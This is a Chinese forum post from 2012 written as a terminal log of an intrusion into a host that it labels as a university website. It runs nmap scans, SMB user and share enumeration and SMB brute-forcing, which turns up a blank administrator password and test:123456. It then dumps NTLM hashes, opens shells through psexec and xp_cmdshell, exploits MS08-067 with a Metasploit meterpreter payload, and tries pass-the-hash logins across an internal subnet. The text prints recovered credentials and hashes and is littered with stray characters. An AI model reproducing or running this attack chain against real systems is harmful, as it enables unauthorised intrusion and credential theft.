广西师范网站http://202.103.242.241// v& w$ o" {, X. \% S& ^& C+ x
, s6 n$ U, O/ \( d' O* D* V
root@bt:~# nmap -sS -sV 202.103.242.241
$ m1 g' f* w% Y* y8 g! A, w& t, F1 \2 K6 b8 k# \7 o
Starting Nmap 5.59BETA1 ( http://nmap.org ) at 2012-02-28 21:54 CST
( q8 {, d/ S/ M5 \8 p0 x
; U$ Q5 B3 S* H+ a9 ]Nmap scan report for bogon (202.103.242.241)0 Q. M+ `6 u8 _) K, Z$ `6 t+ @) K3 f
; A2 B* L! L/ r0 ^+ V0 KHost is up (0.00048s latency).$ \- u* o$ \% @0 k
4 F( E. m; F. V8 O7 l* e) P
Not shown: 993 closed ports3 p9 E% H0 g, m7 Q6 ]
* e7 r7 P, Y8 Z
PORT STATE SERVICE VERSION
: y1 h# ^1 g9 A5 c. h( l7 \* Y7 h1 e2 T1 j
135/tcp open mstask Microsoft mstask (task server – c:\winnt\system32\Mstask.exe)8 j3 h% |( \8 V+ M0 e% @$ r
5 m- [' e. b1 f& K) z F' B# ~139/tcp open netbios-ssn
# p, x" U. O% S% r' x- m" w4 H' S( Q" W9 r A: b
445/tcp open microsoft-ds Microsoft Windows 2000 microsoft-ds
2 _) J. p1 w5 C& H* L7 ~& X! c W8 B6 p! G: \9 G
1025/tcp open mstask Microsoft mstask (task server – c:\winnt\system32\Mstask.exe)
8 p$ o7 A4 m k4 S5 B
" j/ h# _4 [' m1026/tcp open msrpc Microsoft Windows RPC
* F' V2 l7 h X! j) C
) [2 @2 g' Y6 S4 P( q- D) U l6 B4 Q3 w3372/tcp open msdtc?
" |* ]" e( w( M. }
! X& \8 v& S; H) P3389/tcp open ms-term-serv?
5 _7 ^1 \# o3 Y p0 V/ c
5 d. p' {% g8 Y+ h$ s, S1 e1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at http://www.insecure.org/cgi-bin/servicefp-submit.cgi :
- B% X/ J0 V; O/ j q7 YSF-Port3372-TCP:V=5.59BETA1%I=7%D=2/28%Time=4F4CDC90%P=i686-pc-linux-gnu%r0 o& Q( v: n& b3 w$ [
. i$ g3 ]/ u$ s) B
SF GetRequest,6,”hO\n\x000Z”)%r(RTSPRequest,6,”hO\n\x000Z”)%r(HTTPOptions, g# P3 v. s& b# M B, q
Y* ^3 A/ g* Q- n: D: c0 J9 E
SF:,6,”hO\n\x000Z”)%r(Help,6,”hO\n\x000Z”)%r(SSLSessionReq,6,”hO\n\x000Z”)
; X8 X! p8 I$ ]6 h! J7 a' _! y/ m* \/ O' p. V
SF:%r(FourOhFourRequest,6,”hO\n\x000Z”)%r(LPDString,6,”hO\n\x000Z”)%r(SIPO' j* T) J' U" D) H) M9 M/ F& N
; W4 n# s( |, I5 N- `1 ~
SF:ptions,6,”hO\n\x000Z”);( \1 u5 j, x K: \9 T# E
3 I) j0 y7 d8 A* x, h7 CMAC Address: 08:00:27 7:2E:79 (Cadmus Computer Systems)
! v& q/ R/ }+ Q5 S
6 u' }/ Q5 m( P( zService Info: OS: Windows
- T a0 \0 ]: `! `! Y8 c) G& J! @; U% Q$ `
Service detection performed. Please report any incorrect results at http://nmap.org/submit/ .1 r3 q& x$ `7 L E O& g! _
+ p( U) r3 n* h, w$ w
Nmap done: 1 IP address (1 host up) scanned in 79.12 seconds: w: u4 H0 }9 P9 f* ?! N y
* Q c6 a7 f/ s: s0 H9 W0 c
root@bt:/usr/local/share/nmap/scripts# ls -la | grep smb //列出扫描脚本
% k' ~1 F2 h: I. C+ v# Z I' h3 ^/ ^6 B; h1 B
-rw-r–r– 1 root root 44055 2011-07-09 07:36 smb-brute.nse
; }' D6 H8 g7 K! l6 g0 f
7 t9 B3 k! D. v5 l-rw-r–r– 1 root root 27691 2011-07-09 07:36 smb-check-vulns.nse5 Q. ~) ` A) y/ u+ C
6 U7 \+ T, Q& m; H, ^-rw-r–r– 1 root root 4806 2011-07-09 07:36 smb-enum-domains.nse
( T9 l* V0 i* o5 w1 x0 T
1 g% N7 N7 p. R+ H. x# ]-rw-r–r– 1 root root 3475 2011-07-09 07:36 smb-enum-groups.nse
: I6 }' r6 U, R$ w, g5 R0 i
/ E- k5 t& ~ G, F4 F3 j: m-rw-r–r– 1 root root 7958 2011-07-09 07:36 smb-enum-processes.nse
% O6 ]- l6 `& e4 Q, q& }" [ g3 I
8 ~9 @; e) C% O& W7 _-rw-r–r– 1 root root 12221 2011-07-09 07:36 smb-enum-sessions.nse
- Z! e, D6 h/ l: r( d& v
_: ?/ n! [2 Y-rw-r–r– 1 root root 6014 2011-07-09 07:36 smb-enum-shares.nse
3 ^; u& B% |# G8 a0 q8 U# |
) v5 a2 P" C7 N0 k0 g-rw-r–r– 1 root root 12216 2011-07-09 07:36 smb-enum-users.nse
: M6 R6 s* ]1 }5 D7 t$ M4 l6 L5 D2 G: p* V7 c6 M( h
-rw-r–r– 1 root root 1658 2011-07-09 07:36 smb-flood.nse
' g1 U/ f- Q. d) R* q; T0 A. |) n
& q: V, p+ \2 E-rw-r–r– 1 root root 2906 2011-07-09 07:36 smb-os-discovery.nse, h) ^' P1 F9 K4 M9 b' q
7 [& W& ^) x7 A5 Q' X# a9 h
-rw-r–r– 1 root root 61005 2011-07-09 07:36 smb-psexec.nse. ^: G7 h; V$ |% A# @* H3 q
9 E, s1 L9 v! X: e- W
-rw-r–r– 1 root root 4362 2011-07-09 07:36 smb-security-mode.nse
0 V2 n& ~- L; ]5 b, n( K5 P& s O" `) f( E( ^
-rw-r–r– 1 root root 2311 2011-07-09 07:36 smb-server-stats.nse
4 t1 v% p) }' V# V U% D/ A- Y0 X0 l s
-rw-r–r– 1 root root 13719 2011-07-09 07:36 smb-system-info.nse
f6 a: r- O/ o
, ?& B E6 P& E' v-rw-r–r– 1 root root 1429 2011-07-09 07:36 smbv2-enabled.nse. d5 \5 i6 R8 }! t# H; b
4 @) d9 O: r5 ?5 f) o( froot@bt:/usr/local/share/nmap/scripts# nmap –script=smb-enum-users.nse 202.103.242.241
i# p% c; `% }; G3 c
" L1 a* G" M" n* ]//此乃使用脚本扫描远程机器所存在的账户名
! q4 L3 c( S9 o4 ?8 B
+ h5 P9 c- m: e; M" }Starting Nmap 5.59BETA1 ( http://nmap.org ) at 2012-02-28 22:12 CST
* ?+ n2 ^ ?6 \+ v) h& m v# K- \; }4 K+ W$ r/ G6 `$ |% F3 U2 m+ E
Nmap scan report for bogon (202.103.242.241)5 C3 a+ A+ _$ P, z1 l6 ?) ?9 B
9 ^8 C7 b- l6 P7 D* i( U$ v
Host is up (0.00038s latency).5 u! A6 N0 N' x( q9 |9 f) Q
. [, U" A* i' b) _! P, r' x
Not shown: 993 closed ports) w& H6 x! ~1 S1 e
5 p; }; g, r+ T1 z# _) ZPORT STATE SERVICE, ] g5 [9 |8 P i! ~4 m5 P# A
* U8 q1 f( w4 A5 `6 M
135/tcp open msrpc9 @3 B. R Y8 @- g# U
4 }# I! c2 X" m& A
139/tcp open netbios-ssn- @" c# `) \: u4 e. Y
, l, W! |3 X5 F, I; z) `, z0 t445/tcp open microsoft-ds6 j1 v3 `$ \. t2 m; {
' p0 U# x3 x u6 x" U+ s7 K1025/tcp open NFS-or-IIS
! F: e+ p# @; s. T! t7 n- e9 [: q# b! o( ?7 l
1026/tcp open LSA-or-nterm
0 j+ N' S7 Q( E& v4 I" ?# V+ M. b- F8 V
3372/tcp open msdtc
7 @& p- G0 V6 s/ D$ c7 d
F# P/ ^; o+ f7 k3389/tcp open ms-term-serv
6 Z' a- M7 Z% l0 X k
/ e5 f' P8 ?1 v6 V3 i3 rMAC Address: 08:00:277:2E:79 (Cadmus Computer Systems)
3 F: H1 z' r, @0 |2 \
. Q& z/ c8 k2 x7 UHost script results:! C. ?9 ~( T6 p/ v) r G
7 Z7 \1 A |5 z! l- i
| smb-enum-users:
- G5 m) J& x8 X+ T, N
" u7 Q! F. D h1 c|_ Domain: PG-F289F9A8EF3E; Users:Administrator, Guest, test, TsInternetUser //扫描结果
( c! b1 B- U/ i* Z* ?; [* D& w: }* b9 [" m9 }8 c( K8 M4 M
Nmap done: 1 IP address (1 host up) scanned in 1.09 seconds1 ]% ]8 w! M2 v. F# H. c
9 ?2 ?! f* D. G' R5 m% W1 n broot@bt:/usr/local/share/nmap/scripts# nmap –script=smb-enum-shares.nse 202.103.242.241
0 u; S3 d9 E+ Y5 ~- U+ T: F, K$ i9 j$ P! s" x% W0 \
//查看共享) G2 R7 d @ l: F/ d
& K! p+ }4 F9 q% HStarting Nmap 5.59BETA1 ( http://nmap.org ) at 2012-02-28 22:15 CST
' s* n" g+ E5 P: r% {+ a% W2 T7 K+ k; m6 t
Nmap scan report for bogon (202.103.242.241) D `. ~" b, M3 {3 t8 C
% p& T( M" J: h" |4 ^Host is up (0.00035s latency).: A2 n* j, E% ~+ g+ p0 z% m& M# c
9 T9 i4 v% |6 n
Not shown: 993 closed ports8 h0 }; D. m% }' N
- A) P' q6 D8 ^PORT STATE SERVICE
( M& G& U: H% Z; f6 @- F. p; P9 g2 u7 v' J' u
135/tcp open msrpc
8 q% r& `% s r: R( p0 Y
4 u3 y! m$ E! G' y' ^139/tcp open netbios-ssn! q" L$ g/ O# d
6 a1 P5 C) V8 K( Q) Q. R
445/tcp open microsoft-ds
6 p7 J) A# Q* P0 V. n; m7 G
0 e' S# ]$ o7 {. a1025/tcp open NFS-or-IIS
1 m7 Y# H4 {5 X5 C5 _1 }: q6 E) O( u+ f$ x4 ]
1026/tcp open LSA-or-nterm% v, H# W4 g4 J% o9 h; n' }: n
" ?8 A6 u7 v# m) p+ h3372/tcp open msdtc
, n* h! v( P9 u' g: H/ T3 k
. H( ?1 o$ j- Q, P) S6 y3389/tcp open ms-term-serv5 E3 E3 I% b+ T
0 ~3 E/ z9 F9 P) U+ |! P" s& Q3 DMAC Address: 08:00:277:2E:79 (Cadmus Computer Systems)
A+ z0 o, y" A$ I3 Y; g
* l4 M- Z( u% H& B# {Host script results:8 g$ E/ g9 H: e7 V2 v# r+ T7 k- Q
/ s+ P1 Y1 V# C6 O5 J| smb-enum-shares:3 U) O# J! V/ Z1 G2 `* B0 Q2 z
( G" R' m7 S9 C, Z! @5 G7 B| ADMIN$/ L2 s, k+ a* ?. Q4 @) m* A
# R @+ l/ N+ s8 k; }5 T
| Anonymous access: <none> n2 Y( Z# w( H6 u
0 N7 W# v [4 ? g, t8 e( O: v| C$
( Y; T$ O; `% F- y x9 E2 _& o
' X x. Z9 _8 q| Anonymous access: <none>5 z2 r# H* ], C! Z
- [& |& B- {- ~8 X4 M4 s K8 Q) R9 E
| IPC$
- O8 k" o) c6 V1 L, L1 n9 `, Z0 T8 [7 b, q) O
|_ Anonymous access: READ
) H: d- Y% B- p" A
$ Q7 k0 ?' n' X/ BNmap done: 1 IP address (1 host up) scanned in 1.05 seconds
# T8 ` N: X) u) G. z8 ?$ I
" K/ W% W- O) Q$ ?; o; froot@bt:/usr/local/share/nmap/scripts# nmap –script=smb-brute.nse 202.103.242.241
* I8 a2 Y% T1 K$ q2 V
! P/ i$ K& w+ e//获取用户密码5 r8 ]- s# e$ g* }- [ Q5 G o
/ r, x7 @! G @0 @Starting Nmap 5.59BETA1 ( http://nmap.org ) at 2012-02-28 22:17 CST
/ h$ M9 { b$ r: [* O# X2 U
) L q( J- @9 v% E" `Nmap scan report for bogon (202.103.242.2418)- I& \& G7 X. S9 F7 a8 ?( ]# b
P' L% c% K) ~- j0 B; f' O$ kHost is up (0.00041s latency).4 A1 r% V' ^9 x& l1 Z
5 h# V4 B0 {/ [- i( @Not shown: 993 closed ports
8 M' T: L5 d6 t/ X9 [* k# D3 N8 ~& D' X+ q4 q
PORT STATE SERVICE5 [. o0 m' } m% L% U, X, D) K1 p
0 V; y8 h0 r* i135/tcp open msrpc" F& G& q8 w0 `* f) E# {- Y
' s" ?8 {% d+ U* C139/tcp open netbios-ssn
[; ]0 f9 t2 Q4 Y, K: R; [, \1 i! C1 `. r* W, n2 J
445/tcp open microsoft-ds: ^# k3 w, K/ j! H1 y' q
. y8 f, o- o) Y/ M8 B1025/tcp open NFS-or-IIS: R( B. w( Y: v, D
. M/ b# Z3 F0 w6 p
1026/tcp open LSA-or-nterm
& ?# b- u) T, x5 N
$ |/ B3 e$ l+ L1 g* L& Q3372/tcp open msdtc- ^2 j3 L1 E8 Z# ?; D# F
/ N$ \0 h$ b4 `- |1 q) @3389/tcp open ms-term-serv
3 ]* Z7 u3 n$ F) d- b2 e+ g, C) h6 L" K0 p. o
MAC Address: 08:00:277:2E:79 (Cadmus Computer Systems)
% G& S5 t4 h" \7 ~% V. D, J( u! H, q: h0 q/ K3 A. d
Host script results:
" o; G& N. K% I" h; ]; N' b
2 j( E: b( A- v5 Y( t2 i i| smb-brute:* [: A/ @) H7 r
0 v, L* D; y/ b' p! j
administrator:<blank> => Login was successful
* q- S) g+ e) {2 s; g6 @/ E# r0 r/ A0 L. H
|_ test:123456 => Login was successful5 t& @3 R& d- {7 ?
V; h0 ]/ I2 E+ R' W
Nmap done: 1 IP address (1 host up) scanned in 28.22 seconds
) u, L) [0 v0 R: k# N
% T4 Z$ J R5 D$ s. c" ^root@bt:~# wget http://swamp.foofus.net/fizzgig/ ... -exe-only.tar.bz2//抓hash
3 T; U5 M6 d" B) F; r% [' Q. z: c& f& N% t4 ]/ g; C9 q; D
root@bt:~# tar -jxvf pwdump6-1.7.2-exe-only.tar.bz2 -C /usr/local/share/nmap/nselib/data
{8 g2 @7 m2 \& W7 o) p4 G' A+ f% Q
root@bt:/usr/local/share/nmap/scripts# wget https://svn.nmap.org/nmap-exp/dev/nmap/scripts/smb-pwdump.nse. o! w" S+ l! ` o& k
, W" ^& w) S- O. K- }% hroot@bt:~# nmap –script=smb-pwdump.nse –script-args=smbuser=test,smbpass=123456 202.103.242.241 -p 135,445,139
6 ]9 s1 @7 n2 Z; q! Y( {' K
1 w" ~$ z: x; j9 E) k* A# pStarting Nmap 5.59BETA1 ( http://nmap.org ) at 2012-02-29 00:25 CST
6 S, X9 a/ ^5 Y) B2 T, G- l0 ^9 P* k0 @; X6 u+ l3 G4 p
Nmap scan report for bogon (202.103.242.241)
* l' t& h! I; T$ r7 V- N a: L
! e0 I! z# O5 xHost is up (0.0012s latency).
' P+ }$ T# z: J; y1 @( \
' ]7 s: X9 u& @. \9 _. ~PORT STATE SERVICE
* A$ q3 W: v* W* Z" K3 u5 p: w: N7 O6 {1 o: i% _- j z
135/tcp open msrpc
6 G) R/ S+ \' P4 n( C: C' S# l- w; e0 \) G6 d9 o
139/tcp open netbios-ssn
0 p- n0 A4 G$ A
& R: ~& ]8 f! w445/tcp open microsoft-ds3 t) U7 C ]3 \% ]) o" _; h# W
' ] u# S( l1 k( y2 eMAC Address: 08:00:277:2E:79 (Cadmus Computer Systems)1 ^1 c/ m' s: f% Z
1 w! B& ?) ]9 o# x; c) W
Host script results: e! r6 W5 n! v9 s. V: A
( ^- ^: ^' t: T; |8 v1 t
| smb-pwdump:
0 b ?4 B7 z# T9 L8 ~9 q$ n+ v2 Q. ?/ Q
) _' s: F& b2 h| Administrator:500 => NO PASSWORD*********************:NO PASSWORD*********************! T% u i3 [# [0 O9 r D5 U- @# A
: l- c& H; x2 ?9 x| Guest:501 => NO PASSWORD*********************:NO PASSWORD*********************
7 w( Q% a2 `3 G! z) C/ c: o$ q! u" [# x. ^- N) e) Y3 x; h, R
| test:1002 => 44EFCE164AB921CAAAD3B435B51404EE:32ED87BDB5FDC5E9CBA88547376818D4
, K6 R: A: F6 N. c' p1 ?% ]; Z$ W
|_TsInternetUser:1000 => A63D5FC7F284A6CC341A5A0240EF721E:262A84B3E8D4B1CC32131838448C98D2
, I# a/ V3 M/ Z; E8 m% F6 d0 y& [: w
Nmap done: 1 IP address (1 host up) scanned in 1.85 seconds
! ], ?; G8 Q0 B) k4 \( f) ^! ^
* a9 n l. P" j# W. cC:\Documents and Settings\Administrator\桌面>psexec.exe \\202.103.242.241 -u test //获取一个cmdshell
2 ]/ D* H$ b$ p4 o1 l0 T8 l
& M" T& J0 _5 [$ s-p 123456 -e cmd.exe
4 e: i4 \& {$ w( d" y
; X& Q& D$ G+ {# v! M0 FPsExec v1.55 – Execute processes remotely0 Q5 @) Y) W2 i% @
$ D* b' q, E1 b& D q$ Q
Copyright (C) 2001-2004 Mark Russinovich
6 i+ y# p2 ~) W# {3 |; Z: R! X
' N b! w* d' f/ jSysinternals – www.sysinternals.com. S. `- ^( Y( Z0 f! U
9 y% U: i" C8 o+ I& j3 m7 V/ T0 l
Microsoft Windows 2000 [Version 5.00.2195]0 G: ?. p) u' I2 B$ s6 g0 {4 n# Z
8 e& Y& e9 T" o4 c
(C) 版权所有 1985-2000 Microsoft Corp.
6 ?( Q% c2 m2 o! U1 A, g5 V, R, H q8 U0 v
C:\WINNT\system32>ipconfig
8 u" H7 H/ Q/ I4 f# F) N9 F0 {+ W) T3 ^- j; p
Windows 2000 IP Configuration" Y' g4 } @) w$ ?$ @$ O) x/ X
# ]" v1 A4 J' r
Ethernet adapter 本地连接:
1 D7 e6 e; i5 _8 w9 I% p
4 J) q1 z7 ~' rConnection-specific DNS Suffix . :
* \* N2 L3 R. ?& x- Z1 Q! P: S0 m k. c. e9 W2 p* f) n
IP Address. . . . . . . . . . . . : 202.103.242.241
1 n# K; F0 P7 A! `& v; ^* M/ w: {% z! y, l1 c/ V
Subnet Mask . . . . . . . . . . . : 255.255.255.0
0 }; R" T% m6 V( ]0 P, I" R( U: J/ P6 g4 C# F
Default Gateway . . . . . . . . . : 202.103.1.1: b+ y9 V& s: C$ X
' s6 C6 \* n4 K( B
C:\Documents and Settings\Administrator\桌面\osql>osql.exe -S 202.103.242.241 -U sa -P “123456″ -Q “exec master..xp_cmdshell 'net user' “ //远程登录sa执行命令
9 e4 ?$ e4 X) x: n
& `, U3 S0 o2 k( ~& i2 Sroot@bt:/usr/local/share/nmap/scripts# nmap –script=smb-check-vulns.nse 202.103.242.241 //检测目标机器漏洞7 x! c. s! H; V
& {7 }; G- g* iStarting Nmap 5.59BETA1 ( http://nmap.org ) at 2012-02-29 00:41 CST5 B8 D; e/ O' ~4 P- G
- h0 I& a2 N! V
Nmap scan report for bogon (202.103.242.241)) j" X V5 I( N! e% Q( f
/ A' G+ b: j4 j( L( p8 Z
Host is up (0.00046s latency).4 z$ \1 c- N9 a' B2 m: ?
5 z% y& E+ [' NNot shown: 993 closed ports/ C! a6 P' E/ A2 X: f
# ?' o. }5 `: b# Z3 C1 N5 X% J+ S
PORT STATE SERVICE: @* | m: ?6 S. |
" r0 E2 E* {- q1 n135/tcp open msrpc
9 ^% k; t$ K! b0 l
. v* h" p1 R& U8 H' P3 ]5 V8 T139/tcp open netbios-ssn* ~& p& S6 P3 p$ a X
9 R. X7 U! ~# e3 e. T! K5 p445/tcp open microsoft-ds
' ]3 I, `9 p: E" T8 n) D* E/ F1 U
* d/ {) a H+ |: w# H% j+ l( L; U1025/tcp open NFS-or-IIS1 c9 D% U, r# G' D3 T# o' p ?
h8 f, x/ S" R# Z& a1026/tcp open LSA-or-nterm4 a! ?; w4 M9 n
0 Q* j$ Z- ^ p5 g
3372/tcp open msdtc
q# B h2 F J" }$ b/ a' l$ [- v" K: |; R" K8 b% k) b
3389/tcp open ms-term-serv) t" C* p+ a' q1 r" ~7 l& F
' R: e3 `; P2 n, U6 sMAC Address: 08:00:277:2E:79 (Cadmus Computer Systems)
* D4 M) J3 w0 R" ^" p
/ i- H5 }* L; q C* uHost script results:6 Q, X) Z/ k2 S) `
`1 x) I- ^6 O4 U3 _1 s| smb-check-vulns:# y- y* } z! z6 P
7 O a& D4 c! ^9 h1 O+ a|_ MS08-067: VULNERABLE1 N, M9 ^; e( @. E6 g
" @" K) w5 @+ N1 m$ T. F
Nmap done: 1 IP address (1 host up) scanned in 1.43 seconds
% C4 m0 r z/ N# s2 G* m( G( r; @. i
root@bt:~# msfconsole //在msf上利用ms08-067漏洞对目标机器进行溢出2 r, V ]1 u+ q! v
! D y" ]' N+ P3 S5 }3 G8 j3 Imsf > search ms08
, N5 ~. W2 V* s; A- \
0 W* Y' O" O9 [' N& M3 d9 u+ bmsf > use exploit/windows/smb/ms08_067_netapi X, D! o' i9 w- c
1 ^: A( k, g% f# i! wmsf exploit(ms08_067_netapi) > show options
! y, A- z. H2 L |0 L- [/ h
; I9 F$ z; K4 ]$ lmsf exploit(ms08_067_netapi) > set RHOST 202.103.242.241
6 h9 c% v z7 |6 P) E
7 d2 q% L! ]9 I: Omsf exploit(ms08_067_netapi) > show payloads
+ V, n$ `, b: R* `0 [/ ?
% P7 a/ r2 F* }- N+ M- c$ N1 tmsf exploit(ms08_067_netapi) > set PAYLOAD windows/meterpreter/bind_tcp$ Y9 o: E7 P6 s- c" y
" H: \) H8 q/ h" E% h( R+ a* _2 x
msf exploit(ms08_067_netapi) > exploit5 Z7 j7 {1 N2 ^
3 l% m# A7 }% F% A' _! j3 L6 jmeterpreter >
0 [5 t+ x, b& n% I
5 f* A2 i4 t$ H( H/ \( MBackground session 2? [y/N] (ctrl+z)
1 D; h! \ h Z- Q6 I
. `2 P5 x/ K* \; emsf exploit(ms08_067_netapi) > sessions -l+ D S3 u+ a& v9 i1 E, x( r
" @; z3 L# \4 [' f2 }' hroot@bt:/usr/local/share/nmap/scripts# vim usernames.txt
" z& R1 |/ W/ A% E r
/ d9 M2 f1 j% K) ^7 M4 t# |test8 c0 Z( ?) j' @6 L" u. N: l! t4 F
! Q7 n7 P2 x Q- g2 ]
administrator
0 o# R, L; G5 Y1 Y- G- D* _# X( Z: X$ P- n1 @' q8 K
root@bt:/usr/local/share/nmap/scripts# vim password.txt
) [# \ i* Z f5 x$ J* o. o
( y" N& u* b7 o7 j7 i) ~44EFCE164AB921CAAAD3B435B51404EE; i3 H3 y( S B3 U/ X6 Q( i
' U9 I* v+ M+ o( C! Aroot@bt:/usr/local/share/nmap/scripts# nmap –script=smb-brute.nse –script-args=userdb=usernames.txt,passdb=password.txt 192.168.1.1-254 5 V! L, A& e! h6 c: f* D0 B
' B& B$ P, ~/ B/ j
//利用用户名跟获取的hash尝试对整段内网进行登录, t, F# W6 T( J
6 K* X' I; z" s
Nmap scan report for 192.168.1.105+ n0 H% G6 V" U& B# l, }1 P n
1 _ s- N3 K% _. x' ]% M, CHost is up (0.00088s latency).+ K/ z' m# c E) m3 k
+ M. v) Q* H7 Z" S5 |; G+ |( a N
Not shown: 993 closed ports
) m9 t6 [+ o- o/ b, y8 o" [. N C6 {2 w$ \
PORT STATE SERVICE. f; g: d$ G* ^+ v7 {1 e
) U( c7 N$ Z" t& ?
135/tcp open msrpc
5 U, E2 E# }& T0 J, v& p
# e- U; e0 K& f; Q# ^139/tcp open netbios-ssn3 V* E. _1 ?" Q6 s% I$ o3 {
4 a! D- i: {4 P9 n5 L9 T
445/tcp open microsoft-ds% y# y5 b/ X% y) K0 }
5 B ^8 y1 Y ~0 z$ d/ F2 w4 j
1025/tcp open NFS-or-IIS5 t0 k1 i/ j) \# R) |& ^
' d( Z# ~+ O* L# p( o. R: Z1 s1026/tcp open LSA-or-nterm
; o7 r2 |& ?7 @+ ?
+ a* h" K% ~( \3372/tcp open msdtc! X" O1 Y5 n/ v# g! z( X, I5 K) B
* @6 [/ S/ @% b& v9 X% K* g: Y
3389/tcp open ms-term-serv0 T6 V9 V% a# t+ j( ~) X+ I: N
) M* c) m% ?" @& V' R$ [, I5 o3 Y
MAC Address: 08:00:277:2E:79 (Cadmus Computer Systems)
3 D- I6 E# \( x/ u) M) {/ |
$ c! m: Q, |$ Z3 B% KHost script results:
2 M9 a, o( A+ \, ]" e2 m/ E, ]9 d' N5 J% |
| smb-brute:
, a9 ?$ |4 k/ \) k* J) c* m' x' \0 o
+ b& b* R2 e/ V- a5 V7 r|_ administrator:<blank> => Login was successful& Z* ]$ u7 O; }
' z P1 q/ l/ P" s
攻击成功,一个简单的msf+nmap攻击~~·( p" R6 @* V9 C9 U% d
% k7 F. f% c& f; n; B$ h
|
发表于 2012-12-4 12:46:42
收藏
支持
反对